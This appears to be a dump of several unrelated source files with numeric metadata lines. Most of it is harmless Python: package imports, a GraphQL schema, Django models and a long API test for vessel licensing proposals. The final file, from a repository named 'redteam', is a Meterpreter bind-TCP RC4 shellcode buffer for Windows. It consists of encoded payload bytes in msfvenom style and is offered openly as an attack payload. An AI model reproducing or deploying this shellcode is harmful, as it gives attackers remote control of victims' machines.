2019-01-18T16:14:54.000Z
faculty_sync/__init__.py
Matt-Haugh/faculty-sync
56bac90badfe6812f44bad13f56715e4e16f4e57
[ "Apache-2.0" ]
3
2020-01-09T17:03:31.000Z
2021-04-04T10:37:25.000Z
from .app import run # noqa
14.5
28
0.689655
5
29
4
1
0
0
0
0
0
0
0
0
0
0
0
0.241379
29
1
29
29
0.909091
0.137931
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cf15dd2f22f5f6ead7a60c2bea1f3a755aad40b2
180
py
Python
schema/schema.py
akarapun/elearning
fe116d5815925269819061ea183cbfdb773844cf
[ "MIT" ]
1
2020-03-14T11:00:14.000Z
2020-03-14T11:00:14.000Z
schema/schema.py
akarapun/elearning
fe116d5815925269819061ea183cbfdb773844cf
[ "MIT" ]
null
null
null
schema/schema.py
akarapun/elearning
fe116d5815925269819061ea183cbfdb773844cf
[ "MIT" ]
null
null
null
import graphene
from root_query import RootQuery as query
from root_mutation import RootMutation as mutation


def get():
    return graphene.Schema(query=query, mutation=mutation)
25.714286
58
0.816667
25
180
5.8
0.52
0.110345
0
0
0
0
0
0
0
0
0
0
0.133333
180
6
59
30
0.929487
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
true
0
0.6
0.2
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
1
1
0
0
6
cf3333692ac60d08a7e6536dccc579d614d6a1e3
25
py
Python
pimkl/models/__init__.py
PhosphorylatedRabbits/pimkl
824fe70027d7950ea6775c8db2ac587d8504ff3d
[ "MIT" ]
3
2019-10-01T10:05:53.000Z
2021-03-08T12:16:17.000Z
pimkl/models/__init__.py
PhosphorylatedRabbits/pimkl
824fe70027d7950ea6775c8db2ac587d8504ff3d
[ "MIT" ]
82
2019-10-18T16:01:26.000Z
2022-02-03T16:56:04.000Z
pimkl/models/__init__.py
PhosphorylatedRabbits/pimkl
824fe70027d7950ea6775c8db2ac587d8504ff3d
[ "MIT" ]
null
null
null
from .pimkl import PIMKL
12.5
24
0.8
4
25
5
0.75
0
0
0
0
0
0
0
0
0
0
0
0.16
25
1
25
25
0.952381
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cf495150ff1ac19fcbe331ab5bc19db881f77aa9
14,735
py
Python
mooringlicensing/tests/test_proposal_vessel_logic.py
GraemeMuller/mooringlicensing
2b2594189fb88f4add3fbc979a60a05397aaa491
[ "Apache-2.0" ]
null
null
null
mooringlicensing/tests/test_proposal_vessel_logic.py
GraemeMuller/mooringlicensing
2b2594189fb88f4add3fbc979a60a05397aaa491
[ "Apache-2.0" ]
null
null
null
mooringlicensing/tests/test_proposal_vessel_logic.py
GraemeMuller/mooringlicensing
2b2594189fb88f4add3fbc979a60a05397aaa491
[ "Apache-2.0" ]
15
2021-03-02T01:40:12.000Z
2022-02-15T08:26:09.000Z
from mooringlicensing.settings import HTTP_HOST_FOR_TEST
from mooringlicensing.tests.test_setup import APITestSetup
from mooringlicensing.components.proposals.models import MooringBay, Proposal, Vessel
from mooringlicensing.components.proposals.utils import proposal_submit
from datetime import datetime
import pytz
from ledger.settings_base import TIME_ZONE
#from mooringlicensing.tests.test_manage_vessels import ManageVesselTests


class VesselTests(APITestSetup):
    #def test_proposal_wla_vessel_logic(self):
    #    self.wla_vessel_logic()

    def test_create_bare_vessel_add_to_proposal(self):
        create_vessel_data = {
            'vessel': {
                'new_vessel': True,
                'rego_no': '20210503_1',
                'vessel_details': {
                    'read_only': False,
                    'vessel_name': '20210503_1',
                    'berth_mooring': 'home',
                    'vessel_length': '23',
                    'vessel_overall_length': '34',
                    'vessel_weight': '45',
                    'vessel_draft': '56',
                    'vessel_type': 'tender'
                },
                'vessel_ownership': {
                    'registered_owner': 'current_user',
                    'individual_owner': True,
                    'percentage': '35'
                }
            }
        }
        self.client.login(email=self.customer1, password='pass')
        self.client.enforce_csrf_checks=True
        create_response = self.client.post(
            '/api/vessel/',
            #self.create_proposal_data,
            create_vessel_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        #vessel_details_id_1 = create_response.data.get('vessel_details').get('id')
        vessel_id_1 = create_response.data.get('id')
        vessel = Vessel.objects.get(id=vessel_id_1)
        vessel_details_id_1 = vessel.latest_vessel_details.id
        #import ipdb; ipdb.set_trace()
        #manage_vessel_test_cases = ManageVesselTests()
        #vessel_id_1, vessel_details_id_1 = manage_vessel_test_cases.test_manage_vessels()
        ## vessel is now in 'draft' status
        #vessel_details_id_1 = proposal.vessel_details.id
        #vessel_ownership_id_1 = proposal.vessel_ownership.id
        #vessel_id_1 = proposal.vessel_details.vessel_id
        ## Proposal 2 - add vessel from Proposal
        create_response_2 = self.client.post(
            '/api/waitinglistapplication/',
            #self.create_proposal_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(create_response_2.status_code, 200)
        self.assertTrue(create_response_2.data.get('id') > 0)
        proposal_2_id = create_response_2.data.get('id')
        # get proposal
        url2 = 'http://localhost:8071/api/proposal/{}.json'.format(proposal_2_id)
        get_response_2 = self.client.get(url2, HTTP_HOST=HTTP_HOST_FOR_TEST,)
        self.assertEqual(get_response_2.status_code, 200)
        # save Proposal2
        draft_proposal_data = {
            "proposal": {},
            "vessel": {
                "vessel_details": {
                    "id": vessel_details_id_1
                },
                "vessel_ownership": {
                    #"id": vessel_ownership_id_1
                },
                "id": vessel_id_1,
                "read_only": True,
            }
        }
        draft_response = self.client.post(
            '/api/proposal/{}/draft/'.format(proposal_2_id),
            draft_proposal_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(draft_response.status_code, 302)
        ## add DoT rego papers
        rego_papers_response = self.client.post(
            '/api/proposal/{}/process_vessel_registration_document/'.format(proposal_2_id),
            self.rego_papers_data,
            #format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(rego_papers_response.status_code, 200)
        # submit Proposal2
        # submit api endpoint
        submit_proposal_2_data = {
            "proposal": {
                "preferred_bay_id": MooringBay.objects.last().id,
                "silent_elector": False,
            },
            "vessel": {
                "vessel_details": {
                    "id": vessel_details_id_1
                },
                "vessel_ownership": {
                    #"id": vessel_ownership_id_1
                    "org_name": "Company1",
                    "percentage": "65",  # increase to 66 to cause serializer validation error
                    "individual_owner": False
                },
                "id": vessel_id_1,
                "read_only": True,
            }
        }
        submit_2_response = self.client.post(
            '/api/proposal/{}/submit/'.format(proposal_2_id),
            submit_proposal_2_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(submit_2_response.status_code, 200)
        ### proposal_submit(instance, request) - need a request obj, so we just make changes manually here
        #proposal_2 = Proposal.objects.get(id=proposal_2_id)
        #proposal_2.lodgement_date = datetime.now(pytz.timezone(TIME_ZONE))
        #proposal_2.processing_status = 'with_assessor'
        #proposal_2.customer_status = 'with_assessor'
        #proposal_2.save()
        ## proposal and proposal2 should now share the same vessel_details
        #self.assertEqual(proposal.vessel_details, proposal_2.vessel_details)
        #self.assertEqual(proposal.vessel_ownership.vessel, proposal_2.vessel_ownership.vessel)
        #self.assertNotEqual(proposal.vessel_ownership, proposal_2.vessel_ownership)

    def test_proposal_wla_vessel_logic(self):
    #def wla_vessel_logic(self):
        print("test_proposal_wla_vessel_logic")
        self.client.login(email=self.customer, password='pass')
        self.client.enforce_csrf_checks=True
        create_response = self.client.post(
            '/api/waitinglistapplication/',
            #self.create_proposal_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(create_response.status_code, 200)
        self.assertTrue(create_response.data.get('id') > 0)
        proposal_id = create_response.data.get('id')
        # get proposal
        url = 'http://localhost:8071/api/proposal/{}.json'.format(proposal_id)
        get_response = self.client.get(url, HTTP_HOST=HTTP_HOST_FOR_TEST,)
        self.assertEqual(get_response.status_code, 200)
        #######################
        draft_proposal_data = {
            "proposal": {},
            "vessel": {
                "vessel_details": {
                    "vessel_type": "cabin_cruiser",
                    "vessel_name": "gfhj",
                    "vessel_overall_length": "45",
                    "vessel_length": "34",
                    "vessel_draft": "67",
                    "vessel_beam": "0.00",
                    "vessel_weight": "56",
                    "berth_mooring": "fghx"
                },
                "vessel_ownership": {
                    "org_name": None,
                    "percentage": "26",
                    "individual_owner": None
                },
                "rego_no": "20210407_1",
                "vessel_id": None
            }
        }
        draft_response = self.client.post(
            '/api/proposal/{}/draft/'.format(proposal_id),
            draft_proposal_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(draft_response.status_code, 302)
        ## add DoT rego papers
        rego_papers_response = self.client.post(
            '/api/proposal/{}/process_vessel_registration_document/'.format(proposal_id),
            self.rego_papers_data,
            #format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(rego_papers_response.status_code, 200)
        ## add Silent Elector papers
        electoral_roll_doc_response = self.client.post(
            '/api/proposal/{}/process_electoral_roll_document/'.format(proposal_id),
            self.electoral_roll_doc_data,
            #format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(electoral_roll_doc_response.status_code, 200)
        ## submit api endpoint
        #submit_proposal_data = {
        #    "proposal": {
        #        "preferred_bay_id": MooringBay.objects.first().id,
        #    }
        #}
        submit_proposal_data = {
            "proposal": {
                "silent_elector": True,
                "preferred_bay_id": MooringBay.objects.first().id,
            },
            "vessel": {
                "vessel_details": {
                    "vessel_type": "cabin_cruiser",
                    "vessel_name": "gfhj",
                    "vessel_overall_length": "45",
                    "vessel_length": "34",
                    "vessel_draft": "67",
                    "vessel_beam": "0.00",
                    "vessel_weight": "56",
                    "berth_mooring": "fghx"
                },
                "vessel_ownership": {
                    "org_name": None,
                    "percentage": "26",
                    "individual_owner": True
                },
                "rego_no": "20210407_1",
                "vessel_id": None
            }
        }
        submit_response = self.client.post(
            '/api/proposal/{}/submit/'.format(proposal_id),
            submit_proposal_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(submit_response.status_code, 200)
        ## proposal_submit(instance, request) - need a request obj, so we just make changes manually here
        proposal = Proposal.objects.get(id=proposal_id)
        proposal.lodgement_date = datetime.now(pytz.timezone(TIME_ZONE))
        proposal.processing_status = 'with_assessor'
        proposal.customer_status = 'with_assessor'
        proposal.save()
        ## vessel is now in 'draft' status
        vessel_details_id_1 = proposal.vessel_details.id
        vessel_ownership_id_1 = proposal.vessel_ownership.id
        vessel_id_1 = proposal.vessel_details.vessel_id
        ## Proposal 2 - add vessel from Proposal
        create_response_2 = self.client.post(
            '/api/waitinglistapplication/',
            #self.create_proposal_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(create_response_2.status_code, 200)
        self.assertTrue(create_response_2.data.get('id') > 0)
        proposal_2_id = create_response_2.data.get('id')
        # get proposal
        url2 = 'http://localhost:8071/api/proposal/{}.json'.format(proposal_2_id)
        get_response_2 = self.client.get(url2, HTTP_HOST=HTTP_HOST_FOR_TEST,)
        self.assertEqual(get_response_2.status_code, 200)
        # save Proposal2
        draft_proposal_data = {
            "proposal": {},
            "vessel": {
                "vessel_details": {
                    "id": vessel_details_id_1
                },
                "vessel_ownership": {
                    #"id": vessel_ownership_id_1
                },
                "id": vessel_id_1,
                "read_only": True,
            }
        }
        draft_response = self.client.post(
            '/api/proposal/{}/draft/'.format(proposal_2_id),
            draft_proposal_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(draft_response.status_code, 302)
        ## add DoT rego papers
        rego_papers_response = self.client.post(
            '/api/proposal/{}/process_vessel_registration_document/'.format(proposal_2_id),
            self.rego_papers_data,
            #format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(rego_papers_response.status_code, 200)
        # submit Proposal2
        # submit api endpoint
        submit_proposal_2_data = {
            "proposal": {
                "preferred_bay_id": MooringBay.objects.last().id,
                "silent_elector": False,
            },
            "vessel": {
                "vessel_details": {
                    "id": vessel_details_id_1
                },
                "vessel_ownership": {
                    #"id": vessel_ownership_id_1
                    "org_name": "Company1",
                    "percentage": "26",
                    "individual_owner": False
                },
                "id": vessel_id_1,
                "read_only": True,
            }
        }
        submit_2_response = self.client.post(
            '/api/proposal/{}/submit/'.format(proposal_2_id),
            submit_proposal_2_data,
            format='json',
            HTTP_HOST=HTTP_HOST_FOR_TEST,
        )
        self.assertEqual(submit_2_response.status_code, 200)
        ## proposal_submit(instance, request) - need a request obj, so we just make changes manually here
        proposal_2 = Proposal.objects.get(id=proposal_2_id)
        proposal_2.lodgement_date = datetime.now(pytz.timezone(TIME_ZONE))
        proposal_2.processing_status = 'with_assessor'
        proposal_2.customer_status = 'with_assessor'
        proposal_2.save()
        # proposal and proposal2 should now share the same vessel_details
        self.assertEqual(proposal.vessel_details, proposal_2.vessel_details)
        self.assertEqual(proposal.vessel_ownership.vessel, proposal_2.vessel_ownership.vessel)
        self.assertNotEqual(proposal.vessel_ownership, proposal_2.vessel_ownership)
40.259563
106
0.532813
1,413
14,735
5.20736
0.121019
0.038054
0.026909
0.036695
0.833107
0.792607
0.782006
0.732536
0.726284
0.706986
0
0.024609
0.371225
14,735
365
107
40.369863
0.769563
0.152426
0
0.558052
0
0
0.15027
0.042692
0
0
0
0
0.082397
1
0.007491
false
0.007491
0.026217
0
0.037453
0.003745
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
cf87f5c8e02f38ea8f3193bac50bb2b12e7a1fd6
187
py
Python
landlab/plot/network_sediment_transporter/__init__.py
amanaster2/landlab
ea17f8314eb12e3fc76df66c9b6ff32078caa75c
[ "MIT" ]
257
2015-01-13T16:01:21.000Z
2022-03-29T22:37:43.000Z
landlab/plot/network_sediment_transporter/__init__.py
amanaster2/landlab
ea17f8314eb12e3fc76df66c9b6ff32078caa75c
[ "MIT" ]
1,222
2015-02-05T21:36:53.000Z
2022-03-31T17:53:49.000Z
landlab/plot/network_sediment_transporter/__init__.py
amanaster2/landlab
ea17f8314eb12e3fc76df66c9b6ff32078caa75c
[ "MIT" ]
274
2015-02-11T19:56:08.000Z
2022-03-28T23:31:07.000Z
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 18 14:22:27 2019

@author: pfeif
"""
from .plot_network_and_parcels import plot_network_and_parcels

__all__ = ["plot_network_and_parcels"]
18.7
62
0.73262
29
187
4.275862
0.724138
0.266129
0.33871
0.508065
0
0
0
0
0
0
0
0.080247
0.13369
187
9
63
20.777778
0.685185
0.395722
0
0
0
0
0.228571
0.228571
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
d867db88e4ca21f6719c78ccee656b292d5cb54d
87
py
Python
rin/models/builders/__init__.py
an-dyy/Rin
70066f04157a20a08cfe65ce9235ce65d35f8be3
[ "MIT" ]
13
2022-01-15T17:29:17.000Z
2022-02-17T05:43:39.000Z
rin/models/builders/__init__.py
an-dyy/Rin
70066f04157a20a08cfe65ce9235ce65d35f8be3
[ "MIT" ]
3
2022-01-16T18:05:58.000Z
2022-02-18T03:55:50.000Z
rin/models/builders/__init__.py
an-dyy/Rin
70066f04157a20a08cfe65ce9235ce65d35f8be3
[ "MIT" ]
6
2022-01-16T16:45:45.000Z
2022-02-12T18:49:20.000Z
from .ansi import *
from .embed import *
from .intents import *
from .message import *
17.4
22
0.724138
12
87
5.25
0.5
0.47619
0
0
0
0
0
0
0
0
0
0
0.183908
87
4
23
21.75
0.887324
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d886d8769ff3fc634a5efc50044c8c5b5c253a34
125
py
Python
psql/students/views.py
Dickens-odera/Django-postgreSQL
3d169e5146b72ee0c70872f9bcaa68d83bb4d145
[ "MIT" ]
4
2019-03-09T21:51:33.000Z
2019-03-12T13:59:24.000Z
psql/students/views.py
Dickens-odera/Django-postgreSQL
3d169e5146b72ee0c70872f9bcaa68d83bb4d145
[ "MIT" ]
21
2020-01-28T22:37:42.000Z
2022-03-11T23:42:12.000Z
psql/students/views.py
Dickens-odera/Django-postgreSQL
3d169e5146b72ee0c70872f9bcaa68d83bb4d145
[ "MIT" ]
null
null
null
from django.shortcuts import render
from django.views import View


class Student(View):
    # default constructor
    pass
17.857143
35
0.752
16
125
5.875
0.75
0.212766
0
0
0
0
0
0
0
0
0
0
0.2
125
6
36
20.833333
0.94
0.152
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.25
0.5
0
0.75
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
0
0
0
6
d8a1c0d4af343154a7b6e862553ccd0f9afc6287
35
py
Python
munimap/__init__.py
MrSnyder/bielefeldGEOCLIENT
17c78b43fc2055d23a1bc4b5091da164756bf767
[ "Apache-2.0" ]
2
2022-02-07T13:20:45.000Z
2022-02-14T21:40:06.000Z
munimap/__init__.py
MrSnyder/bielefeldGEOCLIENT
17c78b43fc2055d23a1bc4b5091da164756bf767
[ "Apache-2.0" ]
4
2021-06-17T07:53:53.000Z
2021-12-17T10:55:48.000Z
munimap/__init__.py
MrSnyder/bielefeldGEOCLIENT
17c78b43fc2055d23a1bc4b5091da164756bf767
[ "Apache-2.0" ]
2
2021-06-01T09:41:55.000Z
2022-02-14T17:33:33.000Z
from .application import create_app
35
35
0.885714
5
35
6
1
0
0
0
0
0
0
0
0
0
0
0
0.085714
35
1
35
35
0.9375
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d8cecb88a76ac706a809e4cc08eab584a400780c
95
py
Python
testproj/models.py
SweetProcess/django-postgres-queue
55486edd311605ce9da43b330a097effc9d8d0c4
[ "BSD-2-Clause" ]
12
2020-02-28T10:13:16.000Z
2022-02-07T13:02:42.000Z
testproj/models.py
SweetProcess/django-postgres-queue
55486edd311605ce9da43b330a097effc9d8d0c4
[ "BSD-2-Clause" ]
7
2020-04-29T07:10:06.000Z
2022-02-18T04:47:14.000Z
testproj/models.py
SweetProcess/django-postgres-queue
55486edd311605ce9da43b330a097effc9d8d0c4
[ "BSD-2-Clause" ]
2
2020-04-29T01:07:58.000Z
2020-07-24T07:34:50.000Z
from django.db import models

from pgq.models import BaseJob


class AltJob(BaseJob):
    pass
11.875
30
0.757895
14
95
5.142857
0.714286
0
0
0
0
0
0
0
0
0
0
0
0.189474
95
7
31
13.571429
0.935065
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.25
0.5
0
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
d8f4296e2254125124f067ff59d13993bf9ff9fb
44
py
Python
_ED/_ED_exercicios_lista_01/A_e_B_soma.py
CarlosJunn/Aprendendo_Python
cddb29b5ee2058c3fb612574eb4af414770b7422
[ "MIT" ]
null
null
null
_ED/_ED_exercicios_lista_01/A_e_B_soma.py
CarlosJunn/Aprendendo_Python
cddb29b5ee2058c3fb612574eb4af414770b7422
[ "MIT" ]
null
null
null
_ED/_ED_exercicios_lista_01/A_e_B_soma.py
CarlosJunn/Aprendendo_Python
cddb29b5ee2058c3fb612574eb4af414770b7422
[ "MIT" ]
null
null
null
def soma(var1, var2):
    print(var1 + var2)
22
22
0.636364
7
44
4
0.714286
0.571429
0
0
0
0
0
0
0
0
0
0.114286
0.204545
44
2
22
22
0.685714
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0
0.5
0.5
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
1
0
6
d8f51b1a28eed2fc2cb6f5a816793efa909e560a
44
py
Python
light_cnns/ShuffleNet/__init__.py
murufeng/awesome_lightweight_networks
dfa19bd7ee491a7b7ade360175244c81b3c0e322
[ "MIT" ]
318
2021-08-15T10:33:27.000Z
2022-03-31T16:42:50.000Z
light_cnns/ShuffleNet/__init__.py
x779250919/awesome_lightweight_networks
dfa19bd7ee491a7b7ade360175244c81b3c0e322
[ "MIT" ]
6
2021-11-16T06:27:34.000Z
2022-02-08T07:57:52.000Z
light_cnns/ShuffleNet/__init__.py
x779250919/awesome_lightweight_networks
dfa19bd7ee491a7b7ade360175244c81b3c0e322
[ "MIT" ]
67
2021-11-01T13:06:48.000Z
2022-03-24T12:59:41.000Z
from .blocks import *
from .models import *
22
22
0.727273
6
44
5.333333
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.181818
44
2
23
22
0.888889
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2b11c153be4b8832c6040020cb7d31f81bd55212
177
py
Python
python/testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
class Example1:
    def __init__(self):
        self.field1 = 1


class Example2(Example1):
    def __init__(self):  # Some valuable comment here
        Example1.__init__(self)
22.125
53
0.666667
21
177
5.047619
0.571429
0.226415
0.283019
0.358491
0
0
0
0
0
0
0
0.044776
0.242938
177
8
54
22.125
0.746269
0.146893
0
0.333333
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0
0.666667
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
6
991a18d03a14e31eda4cb23c385430ed43c9548f
584
py
Python
erri/python/lesson_51/divisibility.py
TGITS/programming-workouts
799e805ccf3fd0936ec8ac2417f7193b8e9bcb55
[ "MIT" ]
null
null
null
erri/python/lesson_51/divisibility.py
TGITS/programming-workouts
799e805ccf3fd0936ec8ac2417f7193b8e9bcb55
[ "MIT" ]
16
2020-05-30T12:38:13.000Z
2022-02-19T09:23:31.000Z
erri/python/lesson_51/divisibility.py
TGITS/programming-workouts
799e805ccf3fd0936ec8ac2417f7193b8e9bcb55
[ "MIT" ]
null
null
null
def numbers_divisible_by_5_and_7_between_values(start_value, end_value):
    result = []
    for e in range(start_value, end_value + 1, 5):
        if e % 7 == 0:
            result.append(e)
    return result


def numbers_divisible_by_5_and_13_between_values(start_value, end_value):
    result = []
    for e in range(start_value, end_value + 1, 5):
        if e % 13 == 0:
            result.append(e)
    return result


if __name__ == "__main__":
    print(numbers_divisible_by_5_and_7_between_values(300, 450))
    print(numbers_divisible_by_5_and_13_between_values(300, 450))
29.2
73
0.683219
91
584
3.901099
0.307692
0.180282
0.202817
0.214085
0.929577
0.929577
0.738028
0.738028
0.4
0.4
0
0.068282
0.222603
584
19
74
30.736842
0.713656
0
0
0.533333
0
0
0.013699
0
0
0
0
0
0
1
0.133333
false
0
0
0
0.266667
0.133333
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
51524a18696e566854cad187baecc6f9f444c5a9
137
py
Python
minato_namikaze/bot_files/lib/functions/__init__.py
ooliver1/yondaime-hokage
3552887dc022c8ace13de9dae01392b9471e5f58
[ "Apache-2.0" ]
1
2021-11-04T13:20:36.000Z
2021-11-04T13:20:36.000Z
minato_namikaze/bot_files/lib/functions/__init__.py
ooliver1/yondaime-hokage
3552887dc022c8ace13de9dae01392b9471e5f58
[ "Apache-2.0" ]
null
null
null
minato_namikaze/bot_files/lib/functions/__init__.py
ooliver1/yondaime-hokage
3552887dc022c8ace13de9dae01392b9471e5f58
[ "Apache-2.0" ]
null
null
null
from .meek_moe import *
from .moderation import *
from .owneronly import *
from .tools import *
from .user import *
from .votes import *
19.571429
25
0.737226
19
137
5.263158
0.473684
0.5
0
0
0
0
0
0
0
0
0
0
0.175182
137
6
26
22.833333
0.884956
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
5acfc300def397c83d7759b0f2da4ebf3d019307
75
py
Python
boomdiff/__init__.py
team-boomeraang/cs107-FinalProject
93d854ea2c6dd3a8de68eeacc0bb31f412dbb94a
[ "MIT" ]
null
null
null
boomdiff/__init__.py
team-boomeraang/cs107-FinalProject
93d854ea2c6dd3a8de68eeacc0bb31f412dbb94a
[ "MIT" ]
17
2020-10-05T23:55:45.000Z
2020-12-11T00:25:55.000Z
boomdiff/__init__.py
team-boomeraang/cs107-FinalProject
93d854ea2c6dd3a8de68eeacc0bb31f412dbb94a
[ "MIT" ]
2
2020-12-08T22:13:40.000Z
2021-12-09T04:39:45.000Z
from .autodiff import AD
from . import optimize
from . import loss_function
25
27
0.813333
11
75
5.454545
0.636364
0.333333
0
0
0
0
0
0
0
0
0
0
0.146667
75
3
27
25
0.9375
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
5ad84beee014aae6de8a2c4d64e5d9db308890c2
3,267
py
Python
meterpreter/windows_x86/shellcode_bindtcprc4.py
cobranail/redteam
a21091ac0aef289b61dd05771fff7296fb7c4e7e
[ "MIT" ]
null
null
null
meterpreter/windows_x86/shellcode_bindtcprc4.py
cobranail/redteam
a21091ac0aef289b61dd05771fff7296fb7c4e7e
[ "MIT" ]
null
null
null
meterpreter/windows_x86/shellcode_bindtcprc4.py
cobranail/redteam
a21091ac0aef289b61dd05771fff7296fb7c4e7e
[ "MIT" ]
null
null
null
buf = b"" buf += b"\x48\x31\xc9\x48\x81\xe9\xb1\xff\xff\xff\x48\x8d\x05" buf += b"\xef\xff\xff\xff\x48\xbb\xf8\x3d\x59\x54\x46\x6d\x59" buf += b"\x99\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4" buf += b"\x04\x75\xda\xb0\xb6\x85\x95\x99\xf8\x3d\x18\x05\x07" buf += b"\x3d\x0b\xc8\xae\x75\x68\x86\x23\x25\xd2\xcb\x98\x75" buf += b"\xd2\x06\x5e\x25\xd2\xcb\xd8\x75\xd2\x26\x16\x25\x56" buf += b"\x2e\xb2\x77\x14\x65\x8f\x25\x68\x59\x54\x01\x38\x28" buf += b"\x44\x41\x79\xd8\x39\xf4\x54\x15\x47\xac\xbb\x74\xaa" buf += b"\x7c\x08\x1c\xcd\x3f\x79\x12\xba\x01\x11\x55\x96\x0b" buf += b"\xd8\xe1\xe0\x36\x5b\x5b\xc3\x1f\x59\x99\xf8\xb6\xd9" buf += b"\xdc\x46\x6d\x59\xd1\x7d\xfd\x2d\x33\x0e\x6c\x89\xc9" buf += b"\x73\x75\x41\x10\xcd\x2d\x79\xd0\xf9\xed\xba\x02\x0e" buf += b"\x92\x90\xd8\x73\x09\xd1\x1c\x47\xbb\x14\xa8\x31\x75" buf += b"\x68\x94\xea\x2c\x98\x50\xf5\x7c\x58\x95\x7e\x8d\x2c" buf += b"\x68\xb4\x3e\x15\x70\x4e\x28\x60\x48\x8d\xe5\x01\x10" buf += b"\xcd\x2d\x7d\xd0\xf9\xed\x3f\x15\xcd\x61\x11\xdd\x73" buf += b"\x7d\x45\x1d\x47\xbd\x18\x12\xfc\xb5\x11\x55\x96\x2c" buf += b"\x01\xd8\xa0\x63\x00\x0e\x07\x35\x18\xc0\xb9\x67\x11" buf += b"\xd7\xaa\x4d\x18\xcb\x07\xdd\x01\x15\x1f\x37\x11\x12" buf += b"\xea\xd4\x12\xab\xb9\x92\x04\xd0\x46\x4a\x2a\x66\x19" buf += b"\x5e\x6b\x99\xf8\x7c\x0f\x1d\xcf\x8b\x11\x18\x14\x9d" buf += 